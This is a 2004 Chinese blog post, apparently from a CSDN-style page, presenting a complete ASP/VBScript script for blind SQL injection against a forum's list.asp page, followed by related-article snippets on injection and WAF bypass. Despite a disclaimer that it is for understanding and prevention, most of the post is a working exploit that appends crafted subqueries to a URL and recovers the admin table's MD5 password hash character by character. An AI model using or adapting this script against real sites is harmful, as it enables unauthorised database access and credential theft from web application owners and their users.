SQL注入研究

原创 2004年10月10日 09:21:00
'请勿用于非法用途,本代码只是为了让广大ASP爱好者明白原理,防范于未然。

Function bytes2BSTR(vIn)
dim strReturn
dim i,ThisCharCode,NextCharCode
strReturn = ""
For i = 1 To LenB(vIn)
ThisCharCode = AscB(MidB(vIn,i,1))
If ThisCharCode < &H80 Then
strReturn = strReturn & Chr(ThisCharCode)
Else
NextCharCode = AscB(MidB(vIn,i+1,1))
strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode))
i = i + 1
End If
Next
bytes2BSTR = strReturn
End Function

function getHTTPPage(url)
dim http
set http=createobject("MSXML2.XMLHTTP")
Http.open "GET",url,false
Http.send()
if Http.readystate<>4 then
exit function
end if
getHTTPPage=bytes2BSTR(Http.responseBody)
set http=nothing
if err.number<>0 then err.Clear
end function


Function RegExpTest(patrn, strng)
Dim regEx, retVal ' 建立变量。
Set regEx = New RegExp ' 建立正则表达式。
regEx.Pattern = patrn ' 设置模式。
regEx.IgnoreCase = False ' 设置是否区分大小写。
RegExpTest = regEx.Test(strng) ' 执行搜索测试。
End Function


password=""
keyword="论坛首页"'返回正确页面会出现的字符串
url1="http://qq/bbs/list.asp?boardid=7"'SQL注入入口
passlen=32'MD5密码通常是32位
dim pass
pass=array(48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102)'密码值通常是0-9,a-f


server.ScriptTimeout=999
for i=1 to passlen
flag=false
url=url1&" and (select asc(mid(password,"&i&",1)) from admin where id>0)="'构造的SQL语句这里才是关键
for j=0 to ubound(pass)
str=getHTTPPage(url&pass(j))
flag=RegExpTest(keyword,str)
if flag=true then
password=password&chr(pass(j))
exit for
end if
next
next


response.Write(password)

SQL注入研究

请勿用于非法用途,本代码只是为了让广大ASP爱好者明白原理,防范于未然。Function bytes2BSTR(vIn)dim strReturndim i,ThisCharCode,NextChar...
  • iuhxq
  • iuhxq
  • 2004年09月08日 08:42
  • 1590

深入浅出MYSQL研究--SQL注入防范

在平常的开发中,程序员更加关注SQL是否能够实现预期的功能,客户更加的注重sql的安全问题.实际上,如果SQL语句写作不当,将会给系统造成很大的安全隐患,其中最常见最重要的就是SQL注入. 一.简介 ...
  • tang_huan_11
  • tang_huan_11
  • 2015年01月16日 09:34
  • 950

android防止注入

注入的方式有2种。1:静态注入  2:动态注入。。。静态注入比较经典的案例就是 二次打包了。。比如说 登陆注册的输入框里面注入钩子,盗取账号密码。。。。动态注入的经典例子就是 内存修改器比如说八门神奇...
  • oQiLiXiangFeng
  • oQiLiXiangFeng
  • 2013年12月18日 09:19
  • 1376

我的WafBypass之道(SQL注入篇)

https://xianzhi.aliyun.com/forum/mobile/read/349.html 先知技术社区独家发表本文,如需要转载,请先联系先知技术社区授权;未经授权请勿转载。   ...
  • wjy397
  • wjy397
  • 2016年11月21日 19:57
  • 1738

SQL注入研究[转]

请勿用于非法用途,本代码只是为了让广大ASP爱好者明白原理,防范于未然。Function bytes2BSTR(vIn)dim strReturndim i,ThisCharCode,NextChar...
  • evafly920
  • evafly920
  • 2004年09月09日 08:52
  • 844

SQL注入攻击研究

1.1 SQL注入攻击研究       “注入攻击”这个词在网络上已经是屡见不鲜了。当入侵者准备入侵一台主机时,通常情况下首先查看这台服...
  • u013648937
  • u013648937
  • 2014年10月09日 23:37
  • 809

SQL注入原理与解决方法

一、什么是sql注入? 1、什么是sql注入呢?         所谓SQL注入,就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令,...
  • ls5718
  • ls5718
  • 2016年08月04日 21:27
  • 1383

SQL注入方法大全(超级经典)

声明:本文仅用于教学目的,如果因为本文造成的攻击后果本人概不负责。因为发觉其危害过大,原文已经经过大量删减及修改,即使这样本文的危害性仍然很大,所以请大家不要对国内的站点做任何具有破坏性的操作。考虑再...
  • lubiaopan
  • lubiaopan
  • 2009年08月13日 21:26
  • 5480

SQL注入#和$区别与总结

1.#{} 将传入的数据都当成一个字符串,会对自动传入的数据加一个双引号。 如:order by #user_id#,如果传入的值是111,那么解析成sql时的值为order by "111", ...
  • qq_34446485
  • qq_34446485
  • 2017年08月05日 20:21
  • 578

sql注入经典例子

 https://en.wikipedia.org/wiki/SQL_injection
  • hualusiyu
  • hualusiyu
  • 2015年10月28日 09:55
  • 445
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:SQL注入研究
举报原因:
原因补充:

(最多只允许输入30个字)